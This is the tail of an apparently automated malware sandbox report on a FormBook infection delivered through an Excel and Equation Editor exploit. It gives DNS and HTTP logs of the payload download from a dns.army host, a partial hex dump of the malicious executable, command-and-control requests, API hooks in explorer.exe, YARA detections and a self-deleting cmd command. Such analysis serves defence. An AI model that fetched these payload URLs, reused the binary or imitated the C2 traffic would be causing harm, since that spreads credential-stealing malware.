                                                                                                                                                          Feb 23, 2021 17:47:41.754817009 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.67.62.204A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.754817009 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.183.132.164A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.754817009 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.67.57.56A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:41.754817009 CET8.8.8.8192.168.2.220x68caNo error (0)ow.ly54.183.131.91A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:42.278045893 CET8.8.8.8192.168.2.220xc2deNo error (0)thdyworkfinerainbotm.dns.army103.141.138.118A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:47:42.344486952 CET8.8.8.8192.168.2.220xc2deNo error (0)thdyworkfinerainbotm.dns.army103.141.138.118A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:48:45.931737900 CET8.8.8.8192.168.2.220xccffNo error (0)www.jtelitetraining.comjtelitetraining.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:48:45.931737900 CET8.8.8.8192.168.2.220xccffNo error (0)jtelitetraining.com160.153.136.3A (IP address)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:49:02.263454914 CET8.8.8.8192.168.2.220x2e78No error (0)www.tiwapay.comtiwapay.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Feb 23, 2021 17:49:02.263454914 CET8.8.8.8192.168.2.220x2e78No error (0)tiwapay.com81.169.145.165A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • ow.ly
                                                                                                                                                          • thdyworkfinerainbotm.dns.army
                                                                                                                                                          • www.jtelitetraining.com
                                                                                                                                                          • www.tiwapay.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.224916554.67.120.6580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Feb 23, 2021 17:47:41.970222950 CET0OUTGET /6gT330rxT5U HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: ow.ly
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Feb 23, 2021 17:47:42.185451031 CET1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                          Location: http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                                                                                                                                                          Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-Permitted-Cross-Domain-Policies: master-only
                                                                                                                                                          Date: Tue, 23 Feb 2021 16:47:42 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          X-Pool: owly_web


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.2249166103.141.138.11880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Feb 23, 2021 17:47:42.569209099 CET2OUTGET /findoc/svchost.exe?platform=hootsuite HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Host: thdyworkfinerainbotm.dns.army
                                                                                                                                                          Feb 23, 2021 17:47:42.792349100 CET3INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 23 Feb 2021 16:47:41 GMT
                                                                                                                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0
                                                                                                                                                          Last-Modified: Tue, 23 Feb 2021 13:00:36 GMT
                                                                                                                                                          ETag: "6fe00-5bc0081234afa"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 458240
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 fc 34 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e8 06 00 00 14 00 00 00 00 00 00 86 06 07 00 00 20 00 00 00 20 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 06 07 00 4f 00 00 00 00 20 07 00 2c 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c e6 06 00 00 20 00 00 00 e8 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 11 00 00 00 20 07 00 00 12 00 00 00 ea 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 07 00 00 02 00 00 00 fc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 06 07 00 00 00 00 00 48 00 00 00 02 00 05 00 ec b8 00 00 f0 40 01 00 03 00 00 00 6e 00 00 06 dc f9 01 00 58 0c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 67 01 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 31 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 32 00 00 0a 6f 33 00 00 0a 73 34 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt4`P @ `@4O ,@ H.text `.rsrc, @@.reloc@@BhH@nX0(((o*( (!("(#($*N(og(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*0<~(1,!rp(2o3s4~+*0~
                                                                                                                                                          Feb 23, 2021 17:47:42.792376041 CET5INData Raw: 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 2d 00 00 70 7e 07 00 00 04 6f 35 00 00 0a 28 36 00 00 0a 0b 07 74 26 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 37 00 00 0a 74 06 00 00 02 80
                                                                                                                                                          Data Ascii: +*"*0&(r-p~o5(6t&+*s(7ts8(6*(9*0(o:,(o;*0n~,V~(<(=~,(s>o?
                                                                                                                                                          Feb 23, 2021 17:47:42.792392969 CET6INData Raw: 8e fb 0e 13 10 11 10 20 07 8f fb 0e fe 01 13 31 11 31 2c 0a 20 e7 8e fb 0e 13 10 00 2b 22 11 10 20 ff 8e fb 0e fe 01 13 32 11 32 2c 0a 20 eb 8e fb 0e 13 10 00 2b 09 00 20 c4 8e fb 0e 13 10 00 2a 13 30 05 00 e7 07 00 00 0d 00 00 11 00 17 0b 07 1f
                                                                                                                                                          Data Ascii: 11, +" 22, + *0w"", +##,+ $$, + %%, + &&, + '', +
                                                                                                                                                          Feb 23, 2021 17:47:42.792409897 CET7INData Raw: 20 ea 8e fb 0e fe 01 13 4b 11 4b 2c 0a 20 d2 8e fb 0e 13 15 00 2b 09 00 20 1f 8f fb 0e 13 15 00 1f 63 13 16 11 16 1f 09 fe 01 13 4c 11 4c 2c 0a 20 8d 00 00 00 13 16 00 2b 1c 11 16 1f 58 fe 01 13 4d 11 4d 2c 0a 20 86 00 00 00 13 16 00 2b 06 00 1f
                                                                                                                                                          Data Ascii: KK, + cLL, +XMM, +' VNN, + OO, ++ PP, +" QQ, + YRR,s+*
                                                                                                                                                          Feb 23, 2021 17:47:43.014566898 CET9INData Raw: 0b 00 00 07 02 28 20 00 00 06 28 52 00 00 0a 0b 02 28 2c 00 00 06 13 04 11 04 2c 0d 07 72 d9 01 00 70 28 52 00 00 0a 0b 00 00 1e 8d 71 00 00 01 25 16 07 a2 25 17 72 e3 01 00 70 a2 25 18 02 28 22 00 00 06 a2 25 19 72 e3 01 00 70 a2 25 1a 02 28 24
                                                                                                                                                          Data Ascii: ( (R(,,rp(Rq%%rp%("%rp%($(E%rp%(&%rp(T((,rp(R+(((U(Rq%%rp%(*(U%rp%(,(E%rp(T(.
                                                                                                                                                          Feb 23, 2021 17:47:43.014635086 CET10INData Raw: 00 0a 00 02 6f 44 00 00 06 20 f8 00 00 00 20 41 02 00 00 73 66 00 00 0a 6f 67 00 00 0a 00 02 6f 44 00 00 06 1c 6f 68 00 00 0a 00 02 6f 46 00 00 06 1f 09 6f 60 00 00 0a 00 02 6f 46 00 00 06 17 6f 6b 00 00 0a 00 02 6f 46 00 00 06 20 03 03 00 00 1f
                                                                                                                                                          Data Ascii: oD AsfogoDohoFo`oFokoF scodoFrpoeoF sfogoFohoFrpoloH OscodoHrpoeoH sfogoHoh
                                                                                                                                                          Feb 23, 2021 17:47:43.014691114 CET12INData Raw: 00 00 0a 74 0f 00 00 02 0b 02 6f 3a 00 00 06 72 63 01 00 70 6f 85 00 00 0a 00 02 6f 38 00 00 06 6f 86 00 00 0a 6f 87 00 00 0a 00 02 6f 38 00 00 06 6f 86 00 00 0a 07 6f 88 00 00 0a 26 02 07 28 54 00 00 06 00 00 00 2a 00 13 30 02 00 4f 00 00 00 15
                                                                                                                                                          Data Ascii: to:rcpoo8ooo8oo&(T*0Oo<oto:rcpoo8ooo8oo&(T*0_o,No<oto:rcpoo8oo
                                                                                                                                                          Feb 23, 2021 17:47:43.014760017 CET13INData Raw: 72 00 00 0a 00 02 28 73 00 00 0a 02 6f 59 00 00 06 6f 74 00 00 0a 00 02 19 28 98 00 00 0a 00 02 72 4f 0d 00 70 28 65 00 00 0a 00 02 16 28 99 00 00 0a 00 02 1a 28 75 00 00 0a 00 02 72 4f 0d 00 70 6f 76 00 00 0a 00 02 16 28 77 00 00 0a 00 02 28 78
                                                                                                                                                          Data Ascii: r(soYot(rOp(e((urOpov(w(x*&{$+*"}$*F((*F((*&{%+*"}%*&{&+*"}&*&{'+*"}'*(8(^(`s(b*0
                                                                                                                                                          Feb 23, 2021 17:47:43.014816046 CET14INData Raw: 2b 0f 00 02 6f 9b 00 00 06 16 6f b4 00 00 0a 00 00 28 b5 00 00 0a 28 b6 00 00 0a 0b 02 72 49 18 00 70 07 6f b7 00 00 0a 28 52 00 00 0a 6f 76 00 00 0a 00 02 7b 30 00 00 04 14 72 65 18 00 70 17 8d 19 00 00 01 25 16 72 6d 18 00 70 a2 14 14 14 17 28
                                                                                                                                                          Data Ascii: +oo((rIpo(Rov{0rep%rmp(&{0rep%rup(&{0rep%rp(&{0rep%rp(&{0rep%rp(&{0rep
                                                                                                                                                          Feb 23, 2021 17:47:43.014873028 CET16INData Raw: 2a 00 00 01 1c 00 00 00 00 07 00 0b 12 00 28 4a 00 00 01 00 00 42 00 0a 4c 00 7a 4a 00 00 01 13 30 03 00 2e 00 00 00 09 00 00 11 00 02 7b 2b 00 00 04 16 fe 01 0a 06 2c 1e 02 28 c0 00 00 0a 6f bd 00 00 0a 00 72 03 1e 00 70 16 72 41 01 00 70 28 c3
                                                                                                                                                          Data Ascii: *(JBLzJ0.{+,(orprAp(&*0#rAprQpr]prcp(s%;ooso+:o(6o(o%((1
                                                                                                                                                          Feb 23, 2021 17:47:43.014928102 CET17INData Raw: 00 02 72 6d 18 00 70 28 79 00 00 06 0a de 24 25 28 c1 00 00 0a 0d 00 09 6f c2 00 00 0a 16 72 41 01 00 70 28 c3 00 00 0a 26 28 c4 00 00 0a dd f4 00 00 00 00 02 28 bc 00 00 0a 6f bd 00 00 0a 00 06 72 56 20 00 70 28 52 00 00 0a 73 c5 00 00 0a 0b 00
                                                                                                                                                          Data Ascii: rmp(y$%(orAp(&((orV p(RsoJ%({+,orAp(&o(o(soG%({+,orAp(&o(o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.2249167160.153.136.380C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Feb 23, 2021 17:48:45.993432999 CET486OUTGET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1
                                                                                                                                                          Host: www.jtelitetraining.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Feb 23, 2021 17:48:46.042944908 CET486INHTTP/1.1 302 Found
                                                                                                                                                          Connection: close
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cache-control: no-cache
                                                                                                                                                          Location: /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w==


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          3192.168.2.224916881.169.145.16580C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Feb 23, 2021 17:49:02.308176041 CET487OUTGET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1
                                                                                                                                                          Host: www.tiwapay.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Feb 23, 2021 17:49:02.355357885 CET487INHTTP/1.1 404 Not Found
                                                                                                                                                          Date: Tue, 23 Feb 2021 16:49:02 GMT
                                                                                                                                                          Server: Apache/2.4.46 (Unix)
                                                                                                                                                          Content-Length: 196
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                          Code Manipulations

                                                                                                                                                          User Modules

                                                                                                                                                          Hook Summary

                                                                                                                                                          Function NameHook TypeActive in Processes
                                                                                                                                                          PeekMessageAINLINEexplorer.exe
                                                                                                                                                          PeekMessageWINLINEexplorer.exe
                                                                                                                                                          GetMessageWINLINEexplorer.exe
                                                                                                                                                          GetMessageAINLINEexplorer.exe

                                                                                                                                                          Processes

                                                                                                                                                          Process: explorer.exe, Module: USER32.dll
                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE8
                                                                                                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE8
                                                                                                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE8
                                                                                                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE8

                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:17:46:52
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13fd90000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:13
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                                          File size:458240 bytes
                                                                                                                                                          MD5 hash:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 15%, ReversingLabs
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:20
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                                          File size:458240 bytes
                                                                                                                                                          MD5 hash:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:21
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0xcf0000
                                                                                                                                                          File size:458240 bytes
                                                                                                                                                          MD5 hash:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:37
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                          File size:27136 bytes
                                                                                                                                                          MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:17:47:42
                                                                                                                                                          Start date:23/02/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x4a8a0000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >

                                                                                                                                                            Executed Functions

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
